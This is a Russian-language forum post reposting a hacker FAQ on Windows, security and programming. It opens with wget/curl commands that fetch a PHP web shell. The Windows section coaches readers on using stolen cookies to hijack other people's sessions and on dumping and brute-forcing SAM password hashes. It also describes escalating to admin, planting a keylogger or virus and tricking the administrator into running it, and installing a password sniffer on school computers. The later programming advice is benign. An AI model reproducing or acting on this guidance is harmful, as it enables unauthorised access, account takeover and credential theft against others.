wget: wget -O shell.php yoursite.com/shells/shell.php
GET: GET yoursite.com/shells/shell.php > shell.php
fetch: fetch -o shell.php yoursite.com/shells/shell.php
curl: curl --output shell.php yoursite.com/shells/shell.php

Мне удалось стянуть cookies с чужого компа, что с ними теперь делать?

Ну, во-первых, не радуйся слишком – куки не настолько конфиденциальная информация, как, к примеру, пароль от почты или от инета. Но кое-что, все же сделать можно.
Дело в том, что на некоторых серверах есть механизм авторизации пользователя на длительный срок, и информация об этой авторизации хранится именно в cookies. Ты можешь сделать следующий финт ушами: просто подменить свои куки куками юзера и, если программисты не предусмотрели такую подлянку, запросто войти под чужим логином, сайт тебя сам опознает.
Чаще всего такие фишки катят на форумах, но не на всех.
Это не проканает, если:
    * срок авторизации уже закончился
    * есть привязка к ip-адресу
    * в cookies вообще не хранится конфиденциальная информация
Но перед тем, как производить все эти манипуляции, обязательно просмотри, что же, собственно, есть в куках – возможно, там пароль в открытом виде, или же хеш пароля. Тогда, даже если истек срок действия cookies, есть шанс его расшифровать и зайти под чужим логином. В Опере cookies можно просматривать и редактировать через меню Настройки -> Дополнительно -> cookies.
Если у тебя IE, то есть Internet Explorer, придется воспользоваться дополнительными средствами, например программой IECookiesView.
FAQ по Windows и взлому ПК

Я запускаю консольную программу, появляется черное окошко и исчезает. Что не так?

Сначала надо запустить командную строку Winodws: WinKey + R (или Пуск-> Выполнить), там набери cmd и затем ENTER. Появится черное окошко, куда и надо вводить команды.
Я знаю команду net send. А есть еще какие-нибудь интересные команды?
Список основных команд Windows можно получить, набрав HELP в командной строке. Справка по конкретной команде вызывается так: HELP <имя команды>. Например, HELP LABEL.
Наиболее полезные команды:
CMD
Запуск командной строки [img]/images/smilies/wink.gif[/img]
NET SEND
отправка сообщения другому компьютеру в сети
NET START/STOP
запуск/остановка служб
NETSTAT
вывод активных подключений
NET USER username /ADD
заведение нового пользователя
NET USER username newpassword
смена пароля пользователя username
NET LOCALGROUP Администраторы
вывод всех Администраторов в системе
NET LOCALGROUP Администраторы username /ADD
добавление юзера username в группу Администраторов
LABEL
смена метки диска
PING xakep.ru
проверка доступности хоста и времени его отклика
TRACERT xakep.ru
путь прохождения пакетов в Сети и время отклика каждого сервера
IPCONFIG /ALL
сетевые настройки – IP адрес, DNS, WINS и DHCP сервера и прочее
IPCONFIG /FLUSHDNS
очистка локального DNS-кэша
TASKLIST
вывод всех запущенных процессов
TASKKILL /F /IM notepad.exe
убьет процесс notepad.exe
SHUTDOWN –S
выключение компьютера
SHUTDOWN –R –T 10
перезагрузка через 10 секунд
SHUTDOWN –A
отмена остановки системы (при перезагрузке, выключении и т.п.)
FTP
запуск консольного FTP-клиента
TELNET xakep.ru 80
подключение к 80 порту сервера xakep.ru

Как посмотреть, какие порты у меня открыты?

В командной строке выполнить netstat –a
Как в Windows закрыть определенный порт?

Что такое открытый порт? Это просто ожидание соединения. Если какая-либо программа или сервис ждет входящее подключение на какой-нибудь порт, ты видишь, что этот порт «открыт». Поэтому никакого встронного «рубильника» в Windows, естественно, нет, потому что непонятно, что, собственно, закрывать. Единственный способ прикрыть порт – оборвать соединение и закрыть сокет. Вполне логично, что сделать это можно двумя способами – вырубить соответствующий сервис или программу, либо воспользоваться файрволлом.

У меня в системе куча открытых портов. Это троянцы?

Не исключено, хотя Windows открывает много портов в служебных целях.
Посмотреть, к каким службам Windows относятся определенные порты, можно тут:
http://spy.h12.ru/hack.php?ports

Как взломать ZIP / RAR / SFX архив?

Работу алгоритма, который применяется в RAR и ZIP архивах, в двух словах можно описать так: содержание архива перемешивается с использованием определенного ключа (т.е. пароля). Поэтому даже зная сам алгоритм, но не имея ключа, расшифровать данные невозможно. Так же, как в уравнении 100 – X = Y получить Y, не зная X нельзя, не смотря на то, что алгоритм вычитания одного числа из другого тривиален.
Единственный способ – перебирать все возможные ключи по очереди и смотреть, подходит он к архиву, или нет.
Надо заметить, что шифрующая функция довольно навороченная, особенно в RAR-архивах, поэтому перебор происходит ужасно медленно, даже по сравнению с MD5.
Поэтому подобрать 6-изначный и более пароль к RAR-архиву уже практически нереально в домашних условиях, это займет месяцы и годы. Однако здесь могут реально помочь большие словари для брута. Возможно, там пароль «administrator», который, конечно же, есть в любом словаре [img]/images/smilies/smile.gif[/img]
Наиболее популярные программы для взлома архивов:
Advanced ZIP Password Recovery (ZIP)
Rar Password Recovery (RAR)

Как взломать пароль на BIOS?

Если ты случайно забыл пароль на BIOS от своего компьютера, или от компьютера соседа, есть куча способов исправить это недоразумение. Узнать о них можешь тут:
wahack.org.ru/chd/?sec=lib&ver=html&p=2&text=26
www.fssr.ru/hz.php?name=News&file=a … p;sid=4222
Где в Windows хранятся пароли юзеров?

В Windows 98 пароли хранятся в C:Windows***.pwl, где вместо *** - имя пользователя.
Расшифровать их можно программой RePWL.
В Windows NT/2000/XP пароли находятся в файле SAM:
C:WindowsSystem32configSAM. Доступ к файлу имеет только Windows, поэтому даже находясь под Администратором, скопировать этот файл не выйдет – необходимо грузиться с DOS-дискетки, или другой ОС.
Для брута учеток используется SamInside, или ее более новая версия – InsidePro. Кстати, эта программа позволяет вытащить данные SAM файла непосредственно из системы, если у вас есть права администратора.
Для подбора паролей, скорей всего, помимо SAM файла понадобится еще и System.
Как узнать пароли или повысить права с гостя до админа в Windows XP?
1. У тебя есть права администратора
1.1. Запускаешь InsidePro, там в меню есть опция «импорт учеток с локальной машины» - получаешь хеши всех юзеров, осталось только расшифровать.
1.2. Меняешь любой пароль из командной строки:
NET USER username password /ADD
заведение юзера username с паролем password
NET USER username newpassword
смена пароля пользователя username на newpassword
NET LOCALGROUP Администраторы
вывод всех Администраторов в системе
NET LOCALGROUP Администраторы username /ADD
добавление юзера username в группу Администраторов
2. У тебя нет прав администратора, но есть физический доступ к компьютеру.
2.0 Во-первых, убедись, что у тебя из действительно нет: загрузись в Safe Mode (жми F8 при загрузке) и попробуй зайти под учеткой «Администратор». Очень часто на нее ставят пустой пароль, или что-нибудь вроде «a», «123», или «qwerty»
2.1 Если и правда нет, тогда грузись с DOS-дискетки, флешки, или загрузочного диска, забирай SAM и бруть его с помощью InsidePro.
2.2 Ищи локальный сплоит для повышения прав, и опять же становись админом.
2.3 Есть целый набор утилит для восстановления системы. Лучшая из них называется ERD Commander. ERD Commander 2005 можно скачать в p2p, найти его в Интернете проблематично. Поэтому могу предложить бесплатную альтернативу, всего несколько Мб. Там все подробно описано, как юзать и т.п. Программа представляет собой загрузочный диск, или дискетку, которые просто обнуляют пароль администратора. Достаточно вставить такой диск в дисковод и перезагрузить компьютер.
3. У тебя нет постоянного доступа к машине и/или нет возможности использовать все вышеперечисленные способы.
3.1 Запускай на компе кейлоггер, или вирус, который сможет стащить пароль, и зови админа «установить игрушку»
3.2 Используй сниффер для перехвата админского пароля - самый проверенный способ для школ и информационных классов: заходишь в биос, ставишь загрузку с флопика, грузишься с загрузочной дискеты. Затем кидаешь в папку автозагрузки админа прогу fucklogon, которая методом перехвата winapi снифает все пароли в лог файл... Ждёшь пару дней и читаешь логи, за два дня админ полюбой засветит свой пароль.
3.3 Попробуй проверить, как там с шарами: Набери в командной строке work10C$, где work10 – имя машины в сети. Возможно, получится поиметь доступ к С-диску, а там уже проще – скажем, прописать что-нибудь в autoexec.bat, или в автозапуск и дождаться, пока винду перезагрузят.
Есть ли эмуляторы UNIX систем под Windows?
Конечно, есть. Для компиляции программ, или просто для знакомства с unix shell подойдет cygwin. Если под Windows хочется иметь полноценную UNIX-систему, рекомендую поставить виртуальную машину VMWare – вторая ось будет грузиться прям «внутри» Windows. Вполне полноценная система, в которой не страшно сделать «что-нибудь не то» - крах гостевой операционки в VMWare никак не повлияет на работу основной Windows.

Как можно соединить компьютеры по модему без Интернета?

http://phil.philka.ru/faq/serverconection.htm

Как бесплатно звонить на межгород через Интернет?

Поговорить с любым человеком, у которого есть Интернет, можно с помощью специальных сервисов. Самый популярный подобный сервис в России – Skype. Услуга бесплатная, однако, для этого другой пользователь тоже должен быть подключен к сервису SkyPE. Для того, чтобы звонить на городской телефон, придется заплатить.
Иногда междугородние и международные звонки через Интернет можно делать бесплатно. Как - описано здесь:
http://www.xakep.ru/post/40632/default.asp

Как оптимизировать и ускорить работу Windows XP?

Отличное руководство по настройке Windows XP: http://phil.philka.ru/faq/setupxp.htm

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 03 апр 2009, 09:29

<!--coloro: aqua-->[color= aqua]<!--/coloro--><span style="font-size: 16px">FAQ по безопасности<!--colorc-->[/color]<!--/colorc--></span>
<span style="font-style: italic">ЧаВо с xakep.ru.</span>
Мой файрвол время от времени сообщает мне об RST-атаках, или сканировании портов с сайтов, которые я посещаю. За мной кто-то следит?
RST - это не обязательно настоящая атака. Существует возможность сброса установленного TCP подключения с помощью посылки соответствующих TCP пакетов с набором флагов RST или SYN. Подробно про то, как действительно используют эту уязвимость, можно прочитать на секлабе: www.securitylab.ru/analytics/216346.php.
Но это в теории. В реальности, чаще всего, это ложная тревога.
Если в двух словах, то при серфинге интернета, согласно TCP протоколу, твой компьютер посылает пакеты с какого-нибудь порта (заметь, с любого произвольного порта) на сервер, и ожидает ответа. Если ответа нет, соединение, закрывается. Но есть одно "но" - все пакеты шлются через множество серверов, и один из них, в том числе и тот сайт, к которому ты обращаешься, может просто протормозить с ответом. В итоге, когда он таки вспомнит про тебя, то пришлет пакет с этим самым флагом RST на, увы, уже закрытый порт. А любые пакеты на закрытые порты файрволл (аутпост в частности) воспринимает как попытку сканирования, о чем тебе и сообщает.
Как определить, настоящая это атака, или нет?
Посмотреть whois ip, с которого была "атака" (www.whois-service.ru). Если это обычный сайт, вроде yandex.ru, или xakep.ru, то имеет место быть именно та ситуация, которую я описал, скорее всего, ты сидишь за каким-нибудь тормозным прокси-сервером. Если же это какой-нибудь подозрительный сайт, на котором ты ни разу не был, или же ip вообще не имеет домена, тогда бей тревогу.
Хотя, собственно, зачем? Аутпост у тебя есть, атаки отражает. Вот если бы он сказал "Поздравляем! RST-атака Вашего компьютера успешно проведена", это было бы хуже [img]/images/smilies/smile.gif[/img]
Если просто хочешь отомстить, можешь настучать провайдеру взломщиков, которого можно узнать в том же whois. Там же будет и abuse-адрес провайдера, куда следует писать о нарушениях.
Как безопасно серфить сеть?
Если вкратце, то следует установить виртуальную машину типа VM Ware, настроить виртуальную сеть (благо она это позволяет) и выходить в Сеть только через нее. Если расширенно - прочитай http://www.xakep.ru//post/36536/default.asp.
FAQ по программированию
Какие языки программирования следует изучать в первую очередь?
Важен не сам язык, а мысли, которые этим языком выражают. Практически любую алгоритмическую задачу можно решить на любом языке (за какое время и с какой эффективностью — это уже другой вопрос), поэтому неважно, с какого языка начинать, - все равно за время его изучения он успеет устареть. И следует выбирать тот язык, для изучения которого есть хорошие учебники по программированию, а так же знакомые специалисты, способные проконсультировать и помочь, если вдруг что-то пойдет не так, ведь язык — это не только способ записи алгоритма, но еще и средство общения! В этом качестве языку Си нет равных, и de facto он стал международным стандартом типа английского. Знать его нужно не только затем, чтобы на нем программировать, но и чтобы понимать листинги, приведенные в книгах, посвященных сетевым протоколам или устройству осей. Visual Basic – de facto стандарт в области макроязыков на платформе Windows, и без его знания невозможно эффективно работать с Microsoft Visual Studio. Но Basic совершенно чужд миру UNIX, где ведущую роль играют Perl, AWK и другие скриптовые языки. Если человек может решить свою задачу на языке Х, переход на другой язык для него не будет проблемой.

Стоит ли хвататься за новые технологии типа .NET или посоветуешь держаться старых?

Отечественная система образования до безобразия консервативна и крайне неохотно реагирует на новые технологические веяния и прорывы, поэтому в 99% случаев выпускник ВУЗа к реальной работе не готов и ему следует еще учиться и учиться. А все потому, что у нас традиционно учили фундаментальным основам, а вот американцы, напротив, делают упор на конкретное практическое применение. Девушки, окончившие 2-недельные курсы по Visual Basic'у, составляют определенную конкуренцию специалистам, знающим Си++, потому что они в курсе того, какие есть библиотеки и как ими пользоваться, но создать их самостоятельно не в состоянии. Все, что они могут — это сложить готовые компоненты воедино (а другого зачастую и не требуется). Алгоритмически-ориентированный программист готов запрограммировать что угодно, но... он совершенно не в курсе, какие существуют библиотеки, и не умеет с ними работать. Поэтому при решении типовых задач наиболее конкурентоспособным оказывается программист, идущий в ногу с прогрессом и осваивающий новые библиотеки и framewaork'и по мере их появления, а вот при решении нетипичных задач программисты, знающие фундаментальные основы, получают огромное преимущество. Некоторые ухитряются совмещать оба качества, но это удается лишь немногим.
Насколько важно знать ассемблер?
Несмотря на то, что ассемблер сдает свои позиции, профессиональному программисту знать его необходимо, хотя бы затем, чтобы разбирать аварийные дампы и правильно интерпретировать сообщения о критических ошибках. Не говоря уже о том, что создание эффективного кода без знания архитектуры процессора (и всего компьютера в целом) — невозможно. Знание ассемблера позволяет заглянуть внутрь откомпилированной программы и понять, почему она ведет себя не так, как этого хочется тебе. Операционная система перестает быть черным ящиком, а отсутствие исходных текстов Windows уже не становится преградой в археологических раскопках ее недр. Аргументы в пользу ассемблера можно перечислять бесконечно, и как бы современные языки ни абстрагировались от железа, в жизни каждого программиста периодически возникает жгучая необходимость написать пару ассемблерных строк или понять, что означают уже написанные.
Как устроиться на хорошую работу в России и за рубежом?
Из двух работ лучшей будет та, которая больше нравится тебе. Отсюда следует, что работу нужно искать в соответствии со своими предпочтениями, при этом не пытаясь навязывать эти предпочтения другим. Если на такой-то фирме используется преимущественно DELPHI, глупо пытаться втиснуться туда, зная один лишь Си или Ассемблер. Знания чего бы то ни было при трудоустройстве вообще вторичны. Первично умение себя подать. Матчасть здесь отдыхает, а body language очень рулит. Основная ошибка начинающих — перечисление в резюме огромного перечня языков, сред программирования, операционных систем и библиотек, с которыми они как бы умеют работать. А работодателю на фиг не нужен программист-универсал, по чуть-чуть нахватавшийся всего. Ему нужен как раз человек, знающий свою узкую предметную область, но знающий ее глубоко. К тому же не так важно, сколько программ ты написал, - важнее, сколько из них ты поддерживаешь в настоящий момент.

Почему большинство программистских проектов проваливаются?

В основном это происходит из-за чрезмерного оптимизма и незнания рыночной ситуации. Никогда не стоит исходить из положительных предпосылок. Следует сразу подготовить себя к тому, что проект не будет закончен в намеченный срок, достигнуть стабильной работы программы не удастся, пользователи не будут платить, продукт не будет востребован, и он не будет превосходить имеющиеся на рынке аналоги [img]/images/smilies/smile.gif[/img]. Сумеешь ли ты вести бизнес в таких условиях?! Да, сумеешь, если не станешь сразу замахиваться на большое, а начнешь с малого. Сумеешь, если засунешь идею создать массовый продукт глубоко под хвост и сконцентрируешься на удовлетворении нужд небольшой группы пользователей, игнорируемой компаниями-гигантами. Сумеешь, если вместо одного большого шага будешь делать сто маленьких шажков.
Рефракторинг — бузворд или серебряная пуля?
Существует мнение, что если код не поддерживает автоматическое тестирование, то это отстой, и что перманентный рефракторинг — залог успеха. На самом же деле, сложность тестирующих модулей зачастую в разы превосходит сложность тестируемого ими кода, к тому же тестирующие модули нужно тоже как-то тестировать, а это уже бесконечная рекурсия получается. Существует определенная граница сложности, ниже которой автоматическое тестирование кода экономически неоправданно. А системы, взаимодействующие с внешней средой, могут быть протестированы в автоматическом режиме, только если мы создадим программный эмулятор этой самой среды, который, в свою очередь, тоже будет нуждаться в тестировании. Как разорвать этот замкнутый круг? Разбивать код на множество мелких модулей, каждый из которых будет настолько прост, насколько это вообще возможно. Тестирование модулей при этом значительно упрощается, но резко возрастает количество связей между модулями и, как следствие, появляются ошибки в их взаимодействии. Более того, модульная структура сама по себе гораздо более сложная, чем монолитная. Так что выводы неутешительны. Серебряных пуль нет, качество программного обеспечения по-прежнему остается низким и радикальных прорывов в этой области не наблюдается. Это не значит, что рефракторинг бесполезен, это значит, что он должен применяться с умом.
Как защитить свой код от хакеров?
Хакеры ломают все, что трассируется (а что не трассируется, то дизассемблируется), и надеяться, что выбранная система остановит их, может только идеалист. Хакеры существуют — это факт. И развивать свой бизнес, игнорируя кряки, все равно что вести строительство в Сибири из расчета, что лето никогда не закончится и температура всегда будет держаться выше нуля. Если твоя программа — продукт, ты — «покойник». Если же твоя программа — услуга, хакеры идут лесом, поскольку «взломать» услугу нельзя. Следовательно, нужно развивать онлайновые службы, организовывать обучающие семинары, ориентироваться на комплексные решения (где сама программа — всего лишь часть большой бизнес-машины, то есть сама по себе лишена смысла). Допустим, ты написал такую простейшую штуку как каталогизатор аудио-дисков. А теперь прикрути к нему онлайновую службу, позволяющую пользователям обмениваться своими базами данных (если один человек «вбил» описание дисков в базу, зачем тысячам других делать то же самое), затем начинай привлекать лейблы (или просто магазины, торгующие дисками), предоставив им возможность информировать пользователей о новинках и вести мониторинг реальной популярности своей продукции. В этом случае основным источником прибыли окажутся именно лейблы, а прибыль будет тем выше, чем больше у тебя пользователей. Для этого программа должна распространяться бесплатно. Но даже если она платная, то взломать ее все равно очень и очень сложно, поскольку основную ценность составит онлайновая база данных, доступ к которой контролировать легче.


Вернуться в «Частная Библиотека»

Кто сейчас на форуме

Количество пользователей, которые сейчас просматривают этот форум: нет зарегистрированных пользователей и 2 гостей